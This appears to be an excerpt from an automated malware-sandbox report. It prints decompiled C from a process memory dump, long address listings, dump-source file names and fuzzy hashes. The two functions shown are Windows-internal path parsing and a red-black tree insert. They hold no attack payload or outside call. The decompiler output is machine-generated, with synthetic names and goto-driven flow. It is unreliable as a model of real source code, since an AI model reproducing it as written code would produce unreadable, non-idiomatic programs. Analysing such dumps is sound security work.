										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M1E3C45F8))) {
												case 0:
													_v568 = 0x1e381078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x1e3811c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L1E3C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E1E3EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E1E3EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E1E3A52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E1E3BEB70(1, 0x1e4979a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E1E3BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E1E3E95D0();
																			L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E1E3EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E1E3E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E1E3EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                  0x1e3c4128
                                  0x1e3c4135
                                  0x1e3c413c
                                  0x1e3c4141
                                  0x1e3c4145
                                  0x1e3c4147
                                  0x1e3c414e
                                  0x1e3c4151
                                  0x1e3c4159
                                  0x1e3c415c
                                  0x1e3c4160
                                  0x1e3c4164
                                  0x1e3c4168
                                  0x1e3c416c
                                  0x1e3c417f
                                  0x1e3c4181
                                  0x1e3c446a
                                  0x1e3c446a
                                  0x1e3c418c
                                  0x1e3c4195
                                  0x1e3c4199
                                  0x1e3c4432
                                  0x1e3c4439
                                  0x1e3c443d
                                  0x1e3c4442
                                  0x1e3c4447
                                  0x00000000
                                  0x1e3c419f
                                  0x1e3c41a3
                                  0x1e3c41b1
                                  0x1e3c41b9
                                  0x1e3c41bd
                                  0x1e3c45db
                                  0x1e3c45db
                                  0x00000000
                                  0x1e3c41c3
                                  0x1e3c41c3
                                  0x1e3c41ce
                                  0x1e3c41d4
                                  0x1e40e138
                                  0x1e40e13e
                                  0x1e40e169
                                  0x1e40e16d
                                  0x1e40e19e
                                  0x1e40e16f
                                  0x1e40e16f
                                  0x1e40e175
                                  0x1e40e179
                                  0x1e40e18f
                                  0x1e40e193
                                  0x00000000
                                  0x1e40e199
                                  0x00000000
                                  0x1e40e199
                                  0x1e40e193
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c41da
                                  0x1e3c41da
                                  0x1e3c41df
                                  0x1e3c41e4
                                  0x1e3c41ec
                                  0x1e3c4203
                                  0x1e3c4207
                                  0x1e40e1fd
                                  0x1e3c4222
                                  0x1e3c4226
                                  0x1e40e1f3
                                  0x1e40e1f3
                                  0x1e3c422c
                                  0x1e3c422c
                                  0x1e3c4233
                                  0x1e40e1ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c4239
                                  0x1e3c4239
                                  0x1e3c4239
                                  0x1e3c4239
                                  0x1e3c4233
                                  0x1e3c4226
                                  0x1e3c41ee
                                  0x1e3c41ee
                                  0x1e3c41f4
                                  0x1e3c4575
                                  0x1e40e1b1
                                  0x1e40e1b1
                                  0x00000000
                                  0x1e3c457b
                                  0x1e3c457b
                                  0x1e3c4582
                                  0x1e40e1ab
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c4588
                                  0x1e3c4588
                                  0x1e3c458c
                                  0x1e40e1c4
                                  0x1e40e1c4
                                  0x00000000
                                  0x1e3c4592
                                  0x1e3c4592
                                  0x1e3c4599
                                  0x1e40e1be
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c459f
                                  0x1e3c459f
                                  0x1e3c45a3
                                  0x1e40e1d7
                                  0x1e40e1e4
                                  0x00000000
                                  0x1e3c45a9
                                  0x1e3c45a9
                                  0x1e3c45b0
                                  0x1e40e1d1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c45b6
                                  0x1e3c45b6
                                  0x1e3c45b6
                                  0x00000000
                                  0x1e3c45b6
                                  0x1e3c45b0
                                  0x1e3c45a3
                                  0x1e3c4599
                                  0x1e3c458c
                                  0x1e3c4582
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c41f4
                                  0x1e3c423e
                                  0x1e3c4241
                                  0x1e3c45c0
                                  0x1e3c45c4
                                  0x00000000
                                  0x1e3c45ca
                                  0x1e3c45ca
                                  0x00000000
                                  0x1e40e207
                                  0x1e40e20f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3c45d1
                                  0x00000000
                                  0x00000000
                                  0x1e3c45ca
                                  0x00000000
                                  0x1e3c4247
                                  0x1e3c4247
                                  0x1e3c4247
                                  0x1e3c4249
                                  0x1e3c4249
                                  0x1e3c4249
                                  0x1e3c4251
                                  0x1e3c4251
                                  0x1e3c4257
                                  0x1e3c425f
                                  0x1e3c426e
                                  0x1e3c4270
                                  0x1e3c427a
                                  0x1e40e219
                                  0x1e40e219
                                  0x1e3c4280
                                  0x1e3c4282
                                  0x1e3c4456
                                  0x1e3c45ea
                                  0x00000000
                                  0x1e3c45f0
                                  0x1e40e223
                                  0x00000000
                                  0x1e40e223
                                  0x1e3c445c
                                  0x1e3c445c
                                  0x00000000
                                  0x1e3c445c
                                  0x00000000
                                  0x1e3c4288
                                  0x1e3c428c
                                  0x1e40e298
                                  0x1e3c4292
                                  0x1e3c4292
                                  0x1e3c429e
                                  0x1e3c42a3
                                  0x1e3c42a7
                                  0x1e3c42ac
                                  0x1e40e22d
                                  0x1e3c42b2
                                  0x1e3c42b2
                                  0x1e3c42b9
                                  0x1e3c42bc
                                  0x1e3c42c2
                                  0x1e3c42ca
                                  0x1e3c42cd
                                  0x1e3c42cd
                                  0x1e3c42d4
                                  0x1e3c433f
                                  0x1e3c433f
                                  0x1e3c42d6
                                  0x1e3c42d6
                                  0x1e3c42d9
                                  0x1e3c42dd
                                  0x1e3c42eb
                                  0x1e40e23a
                                  0x1e3c42f1
                                  0x1e3c4305
                                  0x1e3c430d
                                  0x1e3c4315
                                  0x1e3c4318
                                  0x1e3c431f
                                  0x1e3c4322
                                  0x1e3c432e
                                  0x1e3c433b
                                  0x1e3c433b
                                  0x00000000
                                  0x1e3c432e
                                  0x1e3c42eb
                                  0x1e3c434c
                                  0x1e3c434e
                                  0x1e3c4352
                                  0x1e3c4359
                                  0x1e3c435e
                                  0x1e3c4361
                                  0x1e3c436e
                                  0x1e3c438a
                                  0x1e3c438e
                                  0x1e3c4396
                                  0x1e3c439e
                                  0x1e3c43a1
                                  0x1e3c43ad
                                  0x1e3c43bb
                                  0x1e3c43bb
                                  0x1e3c43ad
                                  0x1e3c436e
                                  0x1e3c43bf
                                  0x1e3c43c5
                                  0x1e3c4463
                                  0x1e3c4463
                                  0x1e3c43ce
                                  0x1e3c43d5
                                  0x1e3c43d9
                                  0x1e3c43df
                                  0x1e3c4475
                                  0x1e3c4479
                                  0x1e3c4491
                                  0x1e3c4491
                                  0x1e3c4479
                                  0x1e3c43e5
                                  0x1e3c43eb
                                  0x1e3c43f4
                                  0x1e3c43f6
                                  0x1e3c43f9
                                  0x1e3c43fc
                                  0x1e3c43ff
                                  0x1e3c44e8
                                  0x1e3c44ed
                                  0x1e3c44f3
                                  0x1e40e247
                                  0x00000000
                                  0x1e3c44f9
                                  0x1e3c4504
                                  0x1e3c4508
                                  0x1e3c450f
                                  0x1e40e269
                                  0x00000000
                                  0x1e3c4515
                                  0x1e3c4519
                                  0x1e3c4531
                                  0x1e3c4534
                                  0x1e3c4537
                                  0x1e3c453e
                                  0x1e3c4541
                                  0x1e3c454a
                                  0x1e40e255
                                  0x1e40e255
                                  0x1e40e25b
                                  0x1e40e25e
                                  0x1e40e261
                                  0x1e40e261
                                  0x1e3c4555
                                  0x1e3c4559
                                  0x1e3c455d
                                  0x1e40e26d
                                  0x1e40e270
                                  0x1e40e274
                                  0x1e40e27a
                                  0x1e40e27d
                                  0x1e40e28e
                                  0x1e40e28e
                                  0x1e3c4563
                                  0x1e3c4563
                                  0x1e3c4569
                                  0x1e3c4569
                                  0x00000000
                                  0x1e3c455d
                                  0x1e3c450f
                                  0x00000000
                                  0x1e3c44f3
                                  0x1e3c43ff
                                  0x1e3c4405
                                  0x1e3c4405
                                  0x1e3c4405
                                  0x1e3c42ac
                                  0x1e3c428c
                                  0x1e3c4282
                                  0x1e3c4407
                                  0x1e3c440d
                                  0x1e40e2af
                                  0x1e40e2af
                                  0x1e3c4413
                                  0x1e3c4413
                                  0x00000000
                                  0x1e3c41d4
                                  0x00000000
                                  0x1e3c41c3
                                  0x1e3c41bd
                                  0x1e3c4415
                                  0x1e3c4415
                                  0x1e3c4416
                                  0x1e3c4417
                                  0x1e3c4429
                                  0x1e3c416e
                                  0x1e3c416e
                                  0x1e3c4175
                                  0x1e3c4498
                                  0x1e3c449f
                                  0x1e40e12d
                                  0x00000000
                                  0x1e40e133
                                  0x00000000
                                  0x1e40e133
                                  0x1e3c44a5
                                  0x1e3c44a5
                                  0x1e3c44aa
                                  0x00000000
                                  0x1e3c44bb
                                  0x1e3c44ca
                                  0x1e3c44d6
                                  0x1e3c44d7
                                  0x1e3c44d8
                                  0x1e3c44e3
                                  0x1e3c44e3
                                  0x1e3c44aa
                                  0x1e3c417b
                                  0x1e3c417b
                                  0x1e3c417b
                                  0x00000000
                                  0x1e3c417b
                                  0x1e3c4175
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 20e427a648e830774bb15882ebeaab288558bd5b3981c85618b975f2929638b3
                                  • Instruction ID: 66d964714607f9c7f8e0cb53d725439a794c054f7944c0576d445e2491f4ab72
                                  • Opcode Fuzzy Hash: 20e427a648e830774bb15882ebeaab288558bd5b3981c85618b975f2929638b3
                                  • Instruction Fuzzy Hash: 62F15A74A182518BC714CF59C490A6AB7E6FF88714F154A2FF88ACB290E734ED91CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3BB090, Relevance: .4, Instructions: 405COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 99%
                                  			E1E3BB090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}








































                                  0x1e3bb095
                                  0x1e3bb09b
                                  0x1e3bb09f
                                  0x1e3bb0a5
                                  0x1e3bb0a7
                                  0x1e3bb0aa
                                  0x1e3bb0ad
                                  0x1e3bb0b1
                                  0x1e3bb3f8
                                  0x1e3bb3fa
                                  0x1e3bb3ff
                                  0x1e3bb419
                                  0x1e3bb41b
                                  0x1e3bb41b
                                  0x1e3bb401
                                  0x00000000
                                  0x1e3bb0b7
                                  0x1e3bb0b9
                                  0x1e3bb0bc
                                  0x1e3bb0c0
                                  0x1e3bb0c2
                                  0x1e3bb0c2
                                  0x1e3bb0c4
                                  0x1e3bb0c8
                                  0x1e3bb0cf
                                  0x1e3bb0d1
                                  0x1e3bb0d1
                                  0x1e3bb0da
                                  0x1e3bb0dd
                                  0x1e3bb0df
                                  0x1e3bb0df
                                  0x1e3bb0e4
                                  0x1e3bb0e9
                                  0x1e3bb3e2
                                  0x1e3bb3e5
                                  0x1e3bb3eb
                                  0x1e40a676
                                  0x1e40a67b
                                  0x1e40a67d
                                  0x1e3bb3f1
                                  0x1e3bb3f1
                                  0x1e3bb3f1
                                  0x1e3bb0ef
                                  0x1e3bb0ef
                                  0x1e3bb0ef
                                  0x1e3bb0e9
                                  0x1e3bb0f6
                                  0x1e3bb28d
                                  0x1e3bb28e
                                  0x1e3bb293
                                  0x1e3bb0fc
                                  0x1e3bb0fc
                                  0x1e3bb101
                                  0x1e3bb104
                                  0x1e3bb107
                                  0x1e3bb10c
                                  0x1e40a687
                                  0x1e40a68d
                                  0x1e40a68d
                                  0x1e40a687
                                  0x1e3bb112
                                  0x1e3bb116
                                  0x1e40a696
                                  0x1e40a69c
                                  0x1e40a69c
                                  0x1e40a696
                                  0x1e3bb120
                                  0x1e3bb121
                                  0x1e3bb124
                                  0x1e3bb127
                                  0x1e3bb12a
                                  0x1e3bb12d
                                  0x1e3bb132
                                  0x1e40a6a5
                                  0x00000000
                                  0x00000000
                                  0x1e40a6ab
                                  0x00000000
                                  0x1e3bb138
                                  0x1e3bb138
                                  0x1e3bb13a
                                  0x1e3bb193
                                  0x1e3bb197
                                  0x1e3bb19d
                                  0x1e3bb29c
                                  0x1e3bb29f
                                  0x1e3bb2a2
                                  0x1e3bb2a7
                                  0x1e40a6d2
                                  0x1e40a6d8
                                  0x1e40a6d8
                                  0x1e40a6d2
                                  0x1e3bb2af
                                  0x1e3bb420
                                  0x1e3bb422
                                  0x1e3bb423
                                  0x00000000
                                  0x1e3bb2b5
                                  0x1e3bb2b5
                                  0x1e3bb2ba
                                  0x1e40a6e1
                                  0x1e40a6e7
                                  0x1e40a6e7
                                  0x1e40a6e1
                                  0x1e3bb2c2
                                  0x00000000
                                  0x1e3bb2c8
                                  0x1e3bb2cb
                                  0x1e3bb2d0
                                  0x1e40a6f0
                                  0x1e40a6f6
                                  0x1e40a6f6
                                  0x1e40a6f0
                                  0x1e3bb2d8
                                  0x00000000
                                  0x1e3bb2de
                                  0x1e3bb2de
                                  0x1e3bb2de
                                  0x1e3bb2e1
                                  0x1e3bb2e6
                                  0x1e3bb2eb
                                  0x1e40a6ff
                                  0x1e40a705
                                  0x1e40a705
                                  0x1e40a6ff
                                  0x1e3bb2f3
                                  0x00000000
                                  0x1e3bb2f9
                                  0x1e3bb2fb
                                  0x1e3bb2fd
